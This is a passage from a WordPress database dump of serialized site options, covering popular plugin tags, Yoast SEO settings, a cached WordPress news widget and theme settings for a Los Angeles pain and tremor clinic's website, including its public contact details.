1158\";}s:7:\"widgets\";a:3:{s:4:\"name\";s:7:\"widgets\";s:4:\"slug\";s:7:\"widgets\";s:5:\"count\";s:4:\"1075\";}s:5:\"pages\";a:3:{s:4:\"name\";s:5:\"pages\";s:4:\"slug\";s:5:\"pages\";s:5:\"count\";s:4:\"1053\";}s:6:\"jquery\";a:3:{s:4:\"name\";s:6:\"jquery\";s:4:\"slug\";s:6:\"jquery\";s:5:\"count\";s:3:\"984\";}s:5:\"media\";a:3:{s:4:\"name\";s:5:\"media\";s:4:\"slug\";s:5:\"media\";s:5:\"count\";s:3:\"948\";}s:3:\"rss\";a:3:{s:4:\"name\";s:3:\"rss\";s:4:\"slug\";s:3:\"rss\";s:5:\"count\";s:3:\"904\";}s:9:\"ecommerce\";a:3:{s:4:\"name\";s:9:\"ecommerce\";s:4:\"slug\";s:9:\"ecommerce\";s:5:\"count\";s:3:\"900\";}s:4:\"ajax\";a:3:{s:4:\"name\";s:4:\"AJAX\";s:4:\"slug\";s:4:\"ajax\";s:5:\"count\";s:3:\"888\";}s:5:\"video\";a:3:{s:4:\"name\";s:5:\"video\";s:4:\"slug\";s:5:\"video\";s:5:\"count\";s:3:\"881\";}s:7:\"content\";a:3:{s:4:\"name\";s:7:\"content\";s:4:\"slug\";s:7:\"content\";s:5:\"count\";s:3:\"872\";}s:5:\"login\";a:3:{s:4:\"name\";s:5:\"login\";s:4:\"slug\";s:5:\"login\";s:5:\"count\";s:3:\"864\";}s:10:\"javascript\";a:3:{s:4:\"name\";s:10:\"javascript\";s:4:\"slug\";s:10:\"javascript\";s:5:\"count\";s:3:\"814\";}s:10:\"buddypress\";a:3:{s:4:\"name\";s:10:\"buddypress\";s:4:\"slug\";s:10:\"buddypress\";s:5:\"count\";s:3:\"767\";}s:10:\"responsive\";a:3:{s:4:\"name\";s:10:\"responsive\";s:4:\"slug\";s:10:\"responsive\";s:5:\"count\";s:3:\"766\";}s:8:\"security\";a:3:{s:4:\"name\";s:8:\"security\";s:4:\"slug\";s:8:\"security\";s:5:\"count\";s:3:\"752\";}s:5:\"photo\";a:3:{s:4:\"name\";s:5:\"photo\";s:4:\"slug\";s:5:\"photo\";s:5:\"count\";s:3:\"735\";}s:4:\"feed\";a:3:{s:4:\"name\";s:4:\"feed\";s:4:\"slug\";s:4:\"feed\";s:5:\"count\";s:3:\"730\";}s:4:\"spam\";a:3:{s:4:\"name\";s:4:\"spam\";s:4:\"slug\";s:4:\"spam\";s:5:\"count\";s:3:\"729\";}s:7:\"youtube\";a:3:{s:4:\"name\";s:7:\"youtube\";s:4:\"slug\";s:7:\"youtube\";s:5:\"count\";s:3:\"726\";}s:4:\"link\";a:3:{s:4:\"name\";s:4:\"link\";s:4:\"slug\";s:4:\"link\";s:5:\"count\";s:3:\"721\";}s:5:\"share\";a:3:{s:4:\"name\";s:5:\"Share\";s:4:\"slug\";s:5:\"share\";s:5:\"count\";s:3:\"710\";}s:10:\"e-commerce\";a:3:{s:4:\"name\";s:10:\"e-commerce\";s:4:\"slug\";s:10:\"e-commerce\";s:5:\"count\";s:3:\"709\";}s:6:\"photos\";a:3:{s:4:\"name\";s:6:\"photos\";s:4:\"slug\";s:6:\"photos\";s:5:\"count\";s:3:\"680\";}s:8:\"category\";a:3:{s:4:\"name\";s:8:\"category\";s:4:\"slug\";s:8:\"category\";s:5:\"count\";s:3:\"678\";}s:9:\"analytics\";a:3:{s:4:\"name\";s:9:\"analytics\";s:4:\"slug\";s:9:\"analytics\";s:5:\"count\";s:3:\"662\";}s:5:\"embed\";a:3:{s:4:\"name\";s:5:\"embed\";s:4:\"slug\";s:5:\"embed\";s:5:\"count\";s:3:\"657\";}s:4:\"form\";a:3:{s:4:\"name\";s:4:\"form\";s:4:\"slug\";s:4:\"form\";s:5:\"count\";s:3:\"656\";}s:3:\"css\";a:3:{s:4:\"name\";s:3:\"CSS\";s:4:\"slug\";s:3:\"css\";s:5:\"count\";s:3:\"645\";}s:6:\"search\";a:3:{s:4:\"name\";s:6:\"search\";s:4:\"slug\";s:6:\"search\";s:5:\"count\";s:3:\"640\";}s:9:\"slideshow\";a:3:{s:4:\"name\";s:9:\"slideshow\";s:4:\"slug\";s:9:\"slideshow\";s:5:\"count\";s:3:\"631\";}s:6:\"custom\";a:3:{s:4:\"name\";s:6:\"custom\";s:4:\"slug\";s:6:\"custom\";s:5:\"count\";s:3:\"617\";}s:6:\"slider\";a:3:{s:4:\"name\";s:6:\"slider\";s:4:\"slug\";s:6:\"slider\";s:5:\"count\";s:3:\"610\";}s:5:\"stats\";a:3:{s:4:\"name\";s:5:\"stats\";s:4:\"slug\";s:5:\"stats\";s:5:\"count\";s:3:\"599\";}s:6:\"button\";a:3:{s:4:\"name\";s:6:\"button\";s:4:\"slug\";s:6:\"button\";s:5:\"count\";s:3:\"593\";}s:7:\"comment\";a:3:{s:4:\"name\";s:7:\"comment\";s:4:\"slug\";s:7:\"comment\";s:5:\"count\";s:3:\"591\";}s:5:\"theme\";a:3:{s:4:\"name\";s:5:\"theme\";s:4:\"slug\";s:5:\"theme\";s:5:\"count\";s:3:\"583\";}s:4:\"menu\";a:3:{s:4:\"name\";s:4:\"menu\";s:4:\"slug\";s:4:\"menu\";s:5:\"count\";s:3:\"577\";}s:4:\"tags\";a:3:{s:4:\"name\";s:4:\"tags\";s:4:\"slug\";s:4:\"tags\";s:5:\"count\";s:3:\"576\";}s:9:\"dashboard\";a:3:{s:4:\"name\";s:9:\"dashboard\";s:4:\"slug\";s:9:\"dashboard\";s:5:\"count\";s:3:\"570\";}s:10:\"categories\";a:3:{s:4:\"name\";s:10:\"categories\";s:4:\"slug\";s:10:\"categories\";s:5:\"count\";s:3:\"560\";}s:10:\"statistics\";a:3:{s:4:\"name\";s:10:\"statistics\";s:4:\"slug\";s:10:\"statistics\";s:5:\"count\";s:3:\"549\";}s:6:\"mobile\";a:3:{s:4:\"name\";s:6:\"mobile\";s:4:\"slug\";s:6:\"mobile\";s:5:\"count\";s:3:\"541\";}s:3:\"ads\";a:3:{s:4:\"name\";s:3:\"ads\";s:4:\"slug\";s:3:\"ads\";s:5:\"count\";s:3:\"541\";}s:6:\"editor\";a:3:{s:4:\"name\";s:6:\"editor\";s:4:\"slug\";s:6:\"editor\";s:5:\"count\";s:3:\"526\";}s:4:\"user\";a:3:{s:4:\"name\";s:4:\"user\";s:4:\"slug\";s:4:\"user\";s:5:\"count\";s:3:\"526\";}s:5:\"users\";a:3:{s:4:\"name\";s:5:\"users\";s:4:\"slug\";s:5:\"users\";s:5:\"count\";s:3:\"515\";}s:7:\"picture\";a:3:{s:4:\"name\";s:7:\"picture\";s:4:\"slug\";s:7:\"picture\";s:5:\"count\";s:3:\"507\";}s:4:\"list\";a:3:{s:4:\"name\";s:4:\"list\";s:4:\"slug\";s:4:\"list\";s:5:\"count\";s:3:\"503\";}s:7:\"plugins\";a:3:{s:4:\"name\";s:7:\"plugins\";s:4:\"slug\";s:7:\"plugins\";s:5:\"count\";s:3:\"502\";}s:9:\"affiliate\";a:3:{s:4:\"name\";s:9:\"affiliate\";s:4:\"slug\";s:9:\"affiliate\";s:5:\"count\";s:3:\"500\";}s:6:\"simple\";a:3:{s:4:\"name\";s:6:\"simple\";s:4:\"slug\";s:6:\"simple\";s:5:\"count\";s:3:\"483\";}s:9:\"multisite\";a:3:{s:4:\"name\";s:9:\"multisite\";s:4:\"slug\";s:9:\"multisite\";s:5:\"count\";s:3:\"483\";}s:12:\"contact-form\";a:3:{s:4:\"name\";s:12:\"contact form\";s:4:\"slug\";s:12:\"contact-form\";s:5:\"count\";s:3:\"477\";}s:12:\"social-media\";a:3:{s:4:\"name\";s:12:\"social media\";s:4:\"slug\";s:12:\"social-media\";s:5:\"count\";s:3:\"468\";}s:8:\"pictures\";a:3:{s:4:\"name\";s:8:\"pictures\";s:4:\"slug\";s:8:\"pictures\";s:5:\"count\";s:3:\"458\";}s:7:\"contact\";a:3:{s:4:\"name\";s:7:\"contact\";s:4:\"slug\";s:7:\"contact\";s:5:\"count\";s:3:\"457\";}s:10:\"navigation\";a:3:{s:4:\"name\";s:10:\"navigation\";s:4:\"slug\";s:10:\"navigation\";s:5:\"count\";s:3:\"432\";}s:3:\"url\";a:3:{s:4:\"name\";s:3:\"url\";s:4:\"slug\";s:3:\"url\";s:5:\"count\";s:3:\"432\";}s:4:\"html\";a:3:{s:4:\"name\";s:4:\"html\";s:4:\"slug\";s:4:\"html\";s:5:\"count\";s:3:\"426\";}s:4:\"shop\";a:3:{s:4:\"name\";s:4:\"shop\";s:4:\"slug\";s:4:\"shop\";s:5:\"count\";s:3:\"426\";}s:5:\"flash\";a:3:{s:4:\"name\";s:5:\"flash\";s:4:\"slug\";s:5:\"flash\";s:5:\"count\";s:3:\"425\";}s:3:\"api\";a:3:{s:4:\"name\";s:3:\"api\";s:4:\"slug\";s:3:\"api\";s:5:\"count\";s:3:\"418\";}s:10:\"newsletter\";a:3:{s:4:\"name\";s:10:\"newsletter\";s:4:\"slug\";s:10:\"newsletter\";s:5:\"count\";s:3:\"413\";}s:9:\"marketing\";a:3:{s:4:\"name\";s:9:\"marketing\";s:4:\"slug\";s:9:\"marketing\";s:5:\"count\";s:3:\"411\";}s:4:\"meta\";a:3:{s:4:\"name\";s:4:\"meta\";s:4:\"slug\";s:4:\"meta\";s:5:\"count\";s:3:\"409\";}s:8:\"calendar\";a:3:{s:4:\"name\";s:8:\"calendar\";s:4:\"slug\";s:8:\"calendar\";s:5:\"count\";s:3:\"406\";}s:6:\"events\";a:3:{s:4:\"name\";s:6:\"events\";s:4:\"slug\";s:6:\"events\";s:5:\"count\";s:3:\"401\";}s:3:\"tag\";a:3:{s:4:\"name\";s:3:\"tag\";s:4:\"slug\";s:3:\"tag\";s:5:\"count\";s:3:\"400\";}s:4:\"news\";a:3:{s:4:\"name\";s:4:\"News\";s:4:\"slug\";s:4:\"news\";s:5:\"count\";s:3:\"398\";}s:8:\"tracking\";a:3:{s:4:\"name\";s:8:\"tracking\";s:4:\"slug\";s:8:\"tracking\";s:5:\"count\";s:3:\"393\";}s:10:\"shortcodes\";a:3:{s:4:\"name\";s:10:\"shortcodes\";s:4:\"slug\";s:10:\"shortcodes\";s:5:\"count\";s:3:\"391\";}s:11:\"advertising\";a:3:{s:4:\"name\";s:11:\"advertising\";s:4:\"slug\";s:11:\"advertising\";s:5:\"count\";s:3:\"389\";}s:9:\"thumbnail\";a:3:{s:4:\"name\";s:9:\"thumbnail\";s:4:\"slug\";s:9:\"thumbnail\";s:5:\"count\";s:3:\"388\";}s:4:\"text\";a:3:{s:4:\"name\";s:4:\"text\";s:4:\"slug\";s:4:\"text\";s:5:\"count\";s:3:\"384\";}s:6:\"upload\";a:3:{s:4:\"name\";s:6:\"upload\";s:4:\"slug\";s:6:\"upload\";s:5:\"count\";s:3:\"381\";}s:4:\"code\";a:3:{s:4:\"name\";s:4:\"code\";s:4:\"slug\";s:4:\"code\";s:5:\"count\";s:3:\"381\";}s:9:\"automatic\";a:3:{s:4:\"name\";s:9:\"automatic\";s:4:\"slug\";s:9:\"automatic\";s:5:\"count\";s:3:\"378\";}s:8:\"lightbox\";a:3:{s:4:\"name\";s:8:\"lightbox\";s:4:\"slug\";s:8:\"lightbox\";s:5:\"count\";s:3:\"376\";}s:6:\"paypal\";a:3:{s:4:\"name\";s:6:\"paypal\";s:4:\"slug\";s:6:\"paypal\";s:5:\"count\";s:3:\"375\";}s:7:\"sharing\";a:3:{s:4:\"name\";s:7:\"sharing\";s:4:\"slug\";s:7:\"sharing\";s:5:\"count\";s:3:\"374\";}}','yes'),(21475,'wpseo_social','a:21:{s:9:\"fb_admins\";a:0:{}s:12:\"fbconnectkey\";s:32:\"427a7a33ed13511774c5457488444f19\";s:13:\"facebook_site\";s:0:\"\";s:13:\"instagram_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:11:\"myspace_url\";s:0:\"\";s:16:\"og_default_image\";s:0:\"\";s:18:\"og_frontpage_title\";s:0:\"\";s:17:\"og_frontpage_desc\";s:0:\"\";s:18:\"og_frontpage_image\";s:0:\"\";s:9:\"opengraph\";b:1;s:10:\"googleplus\";b:0;s:13:\"pinterest_url\";s:0:\"\";s:15:\"pinterestverify\";s:0:\"\";s:14:\"plus-publisher\";s:0:\"\";s:7:\"twitter\";b:1;s:12:\"twitter_site\";s:0:\"\";s:17:\"twitter_card_type\";s:7:\"summary\";s:11:\"youtube_url\";s:0:\"\";s:15:\"google_plus_url\";s:0:\"\";s:10:\"fbadminapp\";s:0:\"\";}','yes'),(21476,'wpseo_rss','a:2:{s:9:\"rssbefore\";s:0:\"\";s:8:\"rssafter\";s:53:\"The post %%POSTLINK%% appeared first on %%BLOGLINK%%.\";}','yes'),(21477,'wpseo_internallinks','a:14:{s:20:\"breadcrumbs-404crumb\";s:25:\"Error 404: Page not found\";s:23:\"breadcrumbs-blog-remove\";b:0;s:20:\"breadcrumbs-boldlast\";b:0;s:25:\"breadcrumbs-archiveprefix\";s:12:\"Archives for\";s:18:\"breadcrumbs-enable\";b:0;s:16:\"breadcrumbs-home\";s:4:\"Home\";s:18:\"breadcrumbs-prefix\";s:0:\"\";s:24:\"breadcrumbs-searchprefix\";s:16:\"You searched for\";s:15:\"breadcrumbs-sep\";s:7:\"»\";s:23:\"post_types-post-maintax\";i:0;s:26:\"post_types-service-maintax\";i:0;s:24:\"post_types-staff-maintax\";i:0;s:34:\"taxonomy-service-category-ptparent\";i:0;s:28:\"taxonomy-department-ptparent\";i:0;}','yes'),(21478,'wpseo_xml','a:21:{s:22:\"disable_author_sitemap\";b:1;s:22:\"disable_author_noposts\";b:1;s:16:\"enablexmlsitemap\";b:1;s:16:\"entries-per-page\";i:1000;s:14:\"excluded-posts\";s:0:\"\";s:38:\"user_role-administrator-not_in_sitemap\";b:0;s:31:\"user_role-editor-not_in_sitemap\";b:0;s:31:\"user_role-author-not_in_sitemap\";b:0;s:36:\"user_role-contributor-not_in_sitemap\";b:0;s:35:\"user_role-subscriber-not_in_sitemap\";b:0;s:30:\"post_types-post-not_in_sitemap\";b:0;s:30:\"post_types-page-not_in_sitemap\";b:0;s:36:\"post_types-attachment-not_in_sitemap\";b:1;s:33:\"post_types-houdini-not_in_sitemap\";b:0;s:33:\"post_types-service-not_in_sitemap\";b:0;s:31:\"post_types-staff-not_in_sitemap\";b:0;s:34:\"taxonomies-category-not_in_sitemap\";b:0;s:34:\"taxonomies-post_tag-not_in_sitemap\";b:0;s:37:\"taxonomies-post_format-not_in_sitemap\";b:0;s:42:\"taxonomies-service-category-not_in_sitemap\";b:0;s:36:\"taxonomies-department-not_in_sitemap\";b:0;}','yes'),(21484,'wpseo_dismiss_recalculate','1','yes'),(26514,'_transient_timeout_feed_mod_867bd5c64f85878d03a060509cd2f92c','1469426403','no'),(26515,'_transient_feed_mod_867bd5c64f85878d03a060509cd2f92c','1469383203','no'),(26523,'_transient_dash_4077549d03da2e451c8b5f002294ff51','<div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'https://wordpress.org/news/2016/07/wordpress-4-6-beta-4/\'>WordPress 4.6 Beta 4</a> <span class=\"rss-date\">July 20, 2016</span><div class=\"rssSummary\">WordPress 4.6 Beta 4 is now available! This software is still in development, so we don’t recommend you run it on a production site. Consider setting up a test site just to play with the new version. To test WordPress 4.6, try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”). Or you can […]</div></li></ul></div><div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'https://apps.wordpress.com/2016/07/16/wordpress-for-ios-version-6-3/\' title=\'Hi there, WordPress users! Version 6.3 of the WordPress for iOS app is now available in the App Store. What’s New: Access your site’s media library — even if WordPress isn’t given permission to access your personal photo library. An improved design makes updating your WordPress.com profile and account settings easier and faster than ever. Several UI fixes. A\'>WP Mobile Apps: WordPress for iOS: Version 6.3</a></li><li><a class=\'rsswidget\' href=\'http://blog.wordpress.tv/2016/07/16/staff-pick-theming-in-wordpress-where-do-i-start/\' title=\'From the stage of WordCamp Europe 2016 here is Edmund Turbin’s great presentation on how to get started in creating WordPress themes. Base theme, child theme, framework – These are a few of the options you can use for creating a WordPress Theme. Wether you are developing a theme for your personal blog, a clients website, or a theme to be used by other sites\'>WordPress.tv Blog: Staff Pick: Theming in WordPress – Where do I start?</a></li><li><a class=\'rsswidget\' href=\'https://poststatus.com/medium-wordpress-draft-podcast/\' title=\'Welcome to the Post Status Draft podcast, which you can find on iTunes, Google Play, Stitcher, and via RSS for your favorite podcatcher. Post Status Draft is hosted by Joe Hoyle — the CTO of Human Made — and Brian Krogsgard. In this episode, Joe and Brian talk about Medium & WordPress and whether Medium and similar platforms are a significant threat to W\'>Post Status: Medium and WordPress — Draft Podcast</a></li></ul></div><div class=\"rss-widget\"><ul><li class=\'dashboard-news-plugin\'><span>Popular Plugin:</span> <a href=\'https://wordpress.org/plugins/google-analytics-dashboard-for-wp/\' class=\'dashboard-news-plugin-link\'>Google Analytics Dashboard for WP</a> <span>(<a href=\'plugin-install.php?tab=plugin-information&plugin=google-analytics-dashboard-for-wp&_wpnonce=d5f8341ab1&TB_iframe=true&width=600&height=800\' class=\'thickbox\' title=\'Google Analytics Dashboard for WP\'>Install</a>)</span></li></ul></div>','no'),(144,'theme_mods_twentyfourteen','a:1:{s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1402804780;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}}}}','yes'),(26519,'_transient_feed_mod_b9388c83948825c1edaef0d856b7b109','1469383203','no'),(26522,'_transient_timeout_dash_4077549d03da2e451c8b5f002294ff51','1469426403','no'),(145,'current_theme','Paeon','yes'),(146,'theme_mods_paeon','a:2:{i:0;b:0;s:18:\"nav_menu_locations\";a:2:{s:15:\"navigation-menu\";i:2;s:11:\"footer-menu\";i:2;}}','yes'),(147,'theme_switched','','yes'),(148,'nice_framework_version','1.1.5','yes'),(149,'nice_options','a:102:{s:12:\"nice_favicon\";s:0:\"\";s:21:\"nice_sidebar_position\";s:5:\"right\";s:16:\"nice_post_author\";s:4:\"true\";s:16:\"nice_back_to_top\";s:4:\"true\";s:18:\"nice_call_now_text\";s:8:\"Call Now\";s:18:\"nice_tracking_code\";s:0:\"\";s:17:\"nice_accent_color\";s:7:\"#3e7ec2\";s:20:\"nice_secondary_color\";s:7:\"#4b6b31\";s:15:\"nice_custom_css\";s:0:\"\";s:9:\"nice_logo\";s:69:\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/logo.png\";s:16:\"nice_logo_retina\";s:0:\"\";s:16:\"nice_logo_height\";s:2:\"70\";s:28:\"nice_header_background_color\";s:7:\"#528bcb\";s:28:\"nice_header_background_image\";s:0:\"\";s:35:\"nice_header_background_image_repeat\";s:6:\"repeat\";s:37:\"nice_header_background_image_position\";s:8:\"left top\";s:14:\"nice_texttitle\";s:5:\"false\";s:20:\"nice_font_site_title\";a:4:{s:4:\"size\";s:2:\"30\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:4:\"#fff\";}s:28:\"nice_custom_copyright_enable\";s:4:\"true\";s:26:\"nice_custom_copyright_text\";s:44:\"NEUROCENTER FOR PAIN AND TREMOR INC. © 2014\";s:19:\"nice_footer_columns\";s:1:\"3\";s:22:\"nice_custom_typography\";s:5:\"false\";s:14:\"nice_font_body\";a:4:{s:4:\"size\";s:2:\"13\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#757B83\";}s:13:\"nice_font_nav\";a:4:{s:4:\"size\";s:2:\"13\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#ffffff\";}s:20:\"nice_font_post_title\";a:4:{s:4:\"size\";s:2:\"30\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#43484D\";}s:19:\"nice_font_post_meta\";a:4:{s:4:\"size\";s:2:\"13\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#BBBBBB\";}s:20:\"nice_font_post_entry\";a:4:{s:4:\"size\";s:2:\"14\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#757B83\";}s:25:\"nice_font_welcome_message\";a:4:{s:4:\"size\";s:2:\"38\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#43484D\";}s:34:\"nice_font_welcome_message_extended\";a:4:{s:4:\"size\";s:2:\"14\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#757B83\";}s:22:\"nice_font_slider_title\";a:4:{s:4:\"size\";s:2:\"38\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#FFFFFF\";}s:24:\"nice_font_slider_content\";a:4:{s:4:\"size\";s:2:\"17\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#FFFFFF\";}s:18:\"nice_social_enable\";s:4:\"true\";s:20:\"nice_welcome_message\";s:0:\"\";s:29:\"nice_welcome_message_extended\";s:0:\"\";s:17:\"nice_staff_enable\";s:4:\"true\";s:16:\"nice_staff_title\";s:17:\"Our Professionals\";s:16:\"nice_staff_order\";s:4:\"date\";s:22:\"nice_staff_button_text\";s:22:\"Meet Our Professionals\";s:21:\"nice_staff_button_url\";s:39:\"http://theworstpain.com/Neuro/our-staff\";s:19:\"nice_service_enable\";s:4:\"true\";s:18:\"nice_service_title\";s:12:\"Our Services\";s:18:\"nice_service_order\";s:4:\"date\";s:23:\"nice_testimonial_enable\";s:4:\"true\";s:22:\"nice_testimonial_title\";s:28:\"What our patients are saying\";s:22:\"nice_testimonial_order\";s:4:\"date\";s:28:\"nice_testimonial_button_text\";s:22:\"Read more testimonials\";s:27:\"nice_testimonial_button_url\";s:38:\"http://theworstpain.com/Neuro/feedback\";s:11:\"nice_slider\";s:4:\"true\";s:19:\"nice_slider_entries\";s:1:\"3\";s:21:\"nice_slider_animation\";s:4:\"fade\";s:19:\"nice_slider_reverse\";s:5:\"false\";s:26:\"nice_slider_pause_on_hover\";s:5:\"false\";s:21:\"nice_slider_randomize\";s:5:\"false\";s:26:\"nice_slider_animation_loop\";s:5:\"false\";s:27:\"nice_slider_animation_speed\";s:3:\"600\";s:21:\"nice_slider_slideshow\";s:5:\"false\";s:27:\"nice_slider_slideshow_speed\";s:4:\"7000\";s:23:\"nice_slider_control_nav\";s:5:\"false\";s:25:\"nice_slider_direction_nav\";s:4:\"true\";s:19:\"nice_slider_caption\";s:4:\"true\";s:10:\"nice_email\";s:27:\"chodakiewitzstaff@yahoo.com\";s:12:\"nice_address\";s:192:\"Locations\r\n\r\nMain location and mailing address\r\n1125 S Beverly Drive, Suite 610\r\nLos Angeles, CA 90035-1182\r\n\r\n9555 Foothill Boulevard\r\nRancho Cucamonga, CA 91730-3575\r\n\r\nM-F 9:00 am - 5:00 pm\";s:15:\"nice_google_map\";s:0:\"\";s:17:\"nice_phone_number\";s:599:\"(310) 553-3379 </br> <div> <a style=\'display:block;\' href=\'http://www.zocdoc.com/practice/neurocenter-for-pain-and-tremor-37021?lock=true&isNewPatient=false&referrerType=Widget\'> <img src=\'http://offsiteSchedule.zocdoc.com/images/remote/book-orange.png\' border=\'0\' /> </a> <a style=\'display:block; position: relative; left: 126px;\' href=\'http://www.zocdoc.com\' title=\'Powered by ZocDoc Doctor Directory\'> <img src=\'http://offsiteSchedule.zocdoc.com/images/remote/powered-by-light.png\' height=\'15px\' width=\'92px\' alt=\'Powered by ZocDoc Doctor Directory\' /> </a> </div>\";s:17:\"nice_hours_format\";s:5:\"h:i A\";s:17:\"nice_monday_hours\";a:1:{i:0;s:1:\"0\";}s:18:\"nice_tuesday_hours\";a:1:{i:0;s:1:\"0\";}s:20:\"nice_wednesday_hours\";a:1:{i:0;s:1:\"0\";}s:19:\"nice_thursday_hours\";a:1:{i:0;s:1:\"0\";}s:17:\"nice_friday_hours\";a:1:{i:0;s:1:\"0\";}s:19:\"nice_saturday_hours\";a:1:{i:0;s:1:\"0\";}s:17:\"nice_sunday_hours\";a:1:{i:0;s:1:\"0\";}s:19:\"nice_wp_resize_crop\";s:4:\"true\";s:17:\"nice_jpeg_quality\";s:2:\"90\";s:17:\"nice_facebook_url\";s:0:\"\";s:16:\"nice_twitter_url\";s:0:\"\";s:15:\"nice_google_url\";s:0:\"\";s:18:\"nice_instagram_url\";s:0:\"\";s:17:\"nice_dribbble_url\";s:0:\"\";s:14:\"nice_vimeo_url\";s:0:\"\";s:15:\"nice_forrst_url\";s:0:\"\";s:15:\"nice_tumblr_url\";s:0:\"\";s:15:\"nice_flickr_url\";s:0:\"\";s:16:\"nice_youtube_url\";s:0:\"\";s:17:\"nice_linkedin_url\";s:0:\"\";s:22:\"nice_fivehundredpx_url\";s:0:\"\";s:16:\"nice_behance_url\";s:0:\"\";s:18:\"nice_devianart_url\";s:0:\"\";s:15:\"nice_envato_url\";s:0:\"\";s:19:\"nice_foursquare_url\";s:0:\"\";s:13:\"nice_path_url\";s:0:\"\";s:18:\"nice_pinterest_url\";s:0:\"\";s:14:\"nice_quora_url\";s:0:\"\";s:14:\"nice_skype_url\";s:0:\"\";s:18:\"nice_wordpress_url\";s:0:\"\";s:16:\"nice_android_url\";s:0:\"\";s:14:\"nice_apple_url\";s:0:\"\";s:18:\"nice_designmoo_url\";s:0:\"\";s:15:\"nice_github_url\";s:0:\"\";s:15:\"nice_paypal_url\";s:0:\"\";s:20:\"nice_squarespace_url\";s:0:\"\";s:15:\"nice_zerply_url\";s:0:\"\";}','yes'),(21479,'rewrite_rules','a:135:{s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:57:\"service-category/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:55:\"index.php?service-category=$matches[1]&feed=$matches[2]\";s:52:\"service-category/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:55:\"index.php?service-category=$matches[1]&feed=$matches[2]\";s:45:\"service-category/([^/]+)/page/?([0-9]{1,})/?$\";s:56:\"index.php?service-category=$matches[1]&paged=$matches[2]\";s:27:\"service-category/([^/]+)/?$\";s:38:\"index.php?service-category=$matches[1]\";s:51:\"department/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?department=$matches[1]&feed=$matches[2]\";s:46:\"department/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?department=$matches[1]&feed=$matches[2]\";s:39:\"department/([^/]+)/page/?([0-9]{1,})/?$\";s:50:\"index.php?department=$matches[1]&paged=$matches[2]\";s:21:\"department/([^/]+)/?$\";s:32:\"index.php?department=$matches[1]\";s:36:\"feedback/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:46:\"feedback/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:66:\"feedback/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:61:\"feedback/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:61:\"feedback/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:29:\"feedback/([^/]+)/trackback/?$\";s:35:\"index.php?feedback=$matches[1]&tb=1\";s:37:\"feedback/([^/]+)/page/?([0-9]{1,})/?$\";s:48:\"index.php?feedback=$matches[1]&paged=$matches[2]\";s:44:\"feedback/([^/]+)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?feedback=$matches[1]&c